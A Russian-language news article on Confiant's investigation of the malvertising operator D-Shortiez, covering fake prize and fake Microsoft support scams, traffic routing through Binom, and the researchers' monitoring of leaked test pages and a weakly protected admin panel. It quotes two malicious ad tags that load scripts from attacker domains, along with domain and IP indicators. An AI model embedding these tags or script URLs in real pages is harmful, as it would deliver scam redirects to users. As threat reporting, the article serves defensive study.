Операторы вредоносной рекламы выкладывали план своих атак в интернет. Каждый день. Полгода. И не думали, что они уже на мушке…

В конце июня 2025 года команда разведки Confiant обнаружила внутреннюю тестовую страницу, связанную с оператором вредоносной рекламы, которого компания отслеживает с 2022 года. Страница открывалась с любого домена из инфраструктуры актора и обновлялась по рабочим дням. Перед очередными волнами кампаний туда добавляли новые домены, фактически публикуя будущие элементы цепочки заранее.

Confiant автоматизировала наблюдение за этой страницей и стала вытаскивать из изменений свежие домены. За счёт этого инфраструктуру удавалось блокировать до того, как объявления начинали показываться на площадках клиентов. По описанию исследователей, защита перестала догонять кампанию по факту и начала перекрывать подготовку ещё до выхода трафика в эфир.

По оценке Confiant, в 2025 году D-Shortiez обеспечил 59 миллионов показов вредоносной рекламы, причём 95,4% пришлись на США. Доля Канады составила 1,4%, Японии – 0,6%, остальных стран – 2,6%. По устройствам лидировали iOS (26 154 969) и Windows (22 977 804), дальше шли Android (7 492 224), Mac OS X (1 971 674), Chrome OS (333 925) и Linux (71 031).

На раннем этапе D-Shortiez делал ставку на принудительные перенаправления. Клик по баннеру не требовался – пользователя уводило со страницы издателя на мошенническую страницу. Confiant выделяет два основных сценария: фальшивые призы под брендом Google и розыгрыши под брендом Amazon. В первом случае жертву проводили через опросы, а на выходе подсовывали партнёрские предложения, среди которых встречались азартные игры и кредитные продукты. Во втором случае пользователя вели на оформление, где просили ввести данные банковской карты, чтобы оплатить 9,95 доллара якобы за доставку приза. Кнопки с условиями и политикой конфиденциальности, по наблюдениям исследователей, не работали, что выглядело как прямой маркер мошенничества.

В июне 2025 года команда увидела, что цепочка поменялась. Индикаторы, которые раньше приводили к призовым страницам через принудительные редиректы, стали вести на схемы техподдержки под видом Microsoft Windows. На таких страницах имитировались уведомления Windows Defender: посетителю сообщали, что его компьютер якобы заражен, и показывали телефон, выдаваемый за линию поддержки Microsoft.

Confiant подчёркивает, что старые и новые кампании вела одна и та же группа. Главный технический аргумент – пересечение инфраструктуры: одинаковые домены и те же пути к документам в адресах всплывали и на призовых страницах, и в цепочках техподдержки. В отчёте приводится пример домена ogvkvulwchwb[.]top и файла dailynews.php: один набор параметров возвращал призовую страницу, другой запускал перенаправление в инфраструктуру техподдержки.

Оператор подбирал, что именно показать человеку, в зависимости от устройства. По данным Confiant, D-Shortiez использовал Binom, систему распределения трафика, которую часто относят к TDS. Такой инструмент работает как развилка: после перенаправления Binom решает, на какую страницу отправить пользователя, и может учитывать, с какого устройства пришёл запрос. Из-за этого на Windows чаще открывались страницы с фальшивой техподдержкой, а на телефонах и планшетах продолжали появляться страницы с обещаниями призов.

Когда аналитики убедились, что оператор активно гонит трафик на фальшивую техподдержку, команда стала искать служебные материалы, которые обычно используют для проверки связок перед массовым запуском. Так и нашлась внутренняя тестовая страница. Страница открывала обычный HTML-файл, где проверяли, как отрабатывают рекламные теги. Внутри были вставки от нескольких рекламных платформ, большинство вставок закомментированы, а одна оставалась включённой. Confiant заметила закономерность: по рабочим дням содержимое менялось, а перед выходом новой волны в трафик туда добавляли свежие домены.

В отчёте приводится пример рекламного тега с этой тестовой страницы. На вид — обычный рекламный блок с картинкой и ссылкой на магазин. Основная часть механики спрятана в подключаемом скрипте и в параметрах запроса: скрипт получает идентификаторы, домен площадки, отметку времени и другие технические данные, которые нужны для работы цепочки и для подстройки под конкретную рекламную среду.

<!-- smartyads -->
  <div id="oisu-opwx-vjuh">
  
  <link rel="stylesheet" href="https://bosbaim.com/dbJ9f8BFJkdoec.css">
  
  <div class="A8s7D9k5j8h7g6f">
  
  <a href="https://www.dillards.com/c/women?srsltid=AfmBOooxD8UJmkelwCNEHHwKec-unwhaSmwqMXxuUrbU6zw-NGhdGjXo" target="_blank">
  
  <img src="https://bosbaim.com//olpkugft7gvBKf.jpg" alt="" class="B9k8S7m6n9b8v7c5">
  
  </a>
  
  <div class="D6f5K9q8r7s6d5f4">SHOP NOW >></div>
  
  </div>
  
  <script src="https://js.bosbaim.com//oikjshbegcd.js?uhoixjhned={bid_id}&pojuh={exchange_title}&trfgb={site_id}&sdce={site_domain}&tyhgb={timestamp}&apodu={device_ip}"></script>
  
  </div>

Тестовая страница дала подсказки и по атрибуции. Внутри встречались комментарии на китайском языке: по описанию Confiant, комментарии связывали теги с рекламными платформами, отмечали дату добавления и факт отправки на модерацию. Там же нашлись учётные данные для панели Baota или Pagoda Panel. Исследователи отмечают, что интерфейс панели не поддерживает другие языки, кроме китайского. В связке с языком комментариев и графиком обновлений, похожим на рабочий режим в определённом часовом поясе, версия о китайскоговорящих операторах получила дополнительную опору.

Спустя три месяца после первой находки Confiant обнаружила второй административный интерфейс, который управлял отдельным кластером кампаний. В конце ноября 2025 года появились новые домены, которых не было на исходной тестовой странице. По техническим отпечаткам домены выглядели связанными с тем же актором, но размещались на другой инфраструктуре.

Новый кластер удалось связать с D-Shortiez через вторую тестовую страницу. В отчёте описан простой тест: запрос файла 01.html на домене jswdfs[.]com возвращал рекламный тег с подключением домена res.cloudhtg[.]com. Пример ответа приводится прямо в тексте отчёта.

curl -s https://www.jswdfs[.]com/01.html
  
  <div id="inner_c_jpg_300">
  
  <a href="https://aaa.com" target="_blank" position-id="inner_c_jpg_300_a">
  
  <img src="https://img.cloudhtg.com/20250712153836_3485.jpg"></a>
  
  <script src="https://res.cloudhtg.com/dvsequence.js?debug=11111"></script>
  
  </div>

Confiant успела получить снимок домена до того, как трафик начали прогонять через Cloudflare. Поэтому в базе Censys остались исходные данные: реальный IP-адрес 156.234.103.174 и указанное местоположение – Гонконг. В тех же результатах, по описанию отчёта, нашлись данные TLS-сертификата, которые связывали эту инфраструктуру с bt.cn и панелью Baota или Pagoda Panel. Для Confiant это выглядело знакомо, такие же инфраструктурные признаки встречались и в основном кластере.

Через несколько дней после того, как новый кластер связали с D-Shortiez, аналитики наткнулись на административную панель. Путь к панели открывался с любого домена кластера. Сначала панель была доступна без авторизации, позже появилась форма входа с паролем. Confiant пишет, что пароль оказался слабым и выглядел как 123*****, поэтому доступ удалось сохранить и продолжить наблюдение.

Внутри панель показывала активные кампании в виде таблицы. В отчёте перечислены поля, которые там были видны: источник рекламы, идентификатор тега, целевая платформа (настольные или мобильные устройства), число неудачных перенаправлений на тысячу, число успешных перенаправлений на тысячу, домен Binom, текущий статус (approving или run), плюс переключатель, который менял состояние.

Такая панель дала главное - время. Пока запись оставалась в статусе approving и ещё не переходила в run, у Confiant появлялся промежуток, чтобы заранее сопоставить данные из панели со своей телеметрией по проверкам рекламных креативов. В отчёте приводится пример: в панели фигурировали тег vi25120203 и домен Binom softluxt.space, и те же значения нашлись в результатах сканирования креативов для этой же кампании. После такого совпадения обслуживающие домены можно было заблокировать ещё до того, как реклама выходила на массовые показы.

В финале Confiant ожидает ответную реакцию со стороны оператора после публикации отчёта. Аналитики предполагают, что оператор начнёт закрывать или бросать засвеченные внутренние страницы, чаще менять инфраструктуру, уходить туда, где защитникам сложнее наблюдать трафик, и аккуратнее защищать учётные данные. При этом сам способ заработка, по оценке Confiant, вряд ли поменяется: оператор продолжит искать слабые места в проверках рекламных платформ и использовать их для массового продвижения мошеннических страниц.

Confiant сообщает, что в течение 2025 года передавала индикаторы D-Shortiez ряду рекламных платформ. Некоторые площадки быстро отключали связанные учётные записи, другие дольше оставались рабочими каналами доставки. Компания продолжает мониторинг и публикует актуальный на момент выхода материала список доменных индикаторов компрометации. Перечень доступен по ссылке: https://github.com/msteele-confiant/D-Shortiez_DomainIOCs

Исследование подготовил Майкл Стил, исследователь угроз в команде безопасности Confiant. В описании его работы говорится о разборе угроз в рекламных технологиях, картировании инфраструктуры и приёмов групп, а также о поиске устойчивых технических маркеров, по которым операторов можно отслеживать со временем.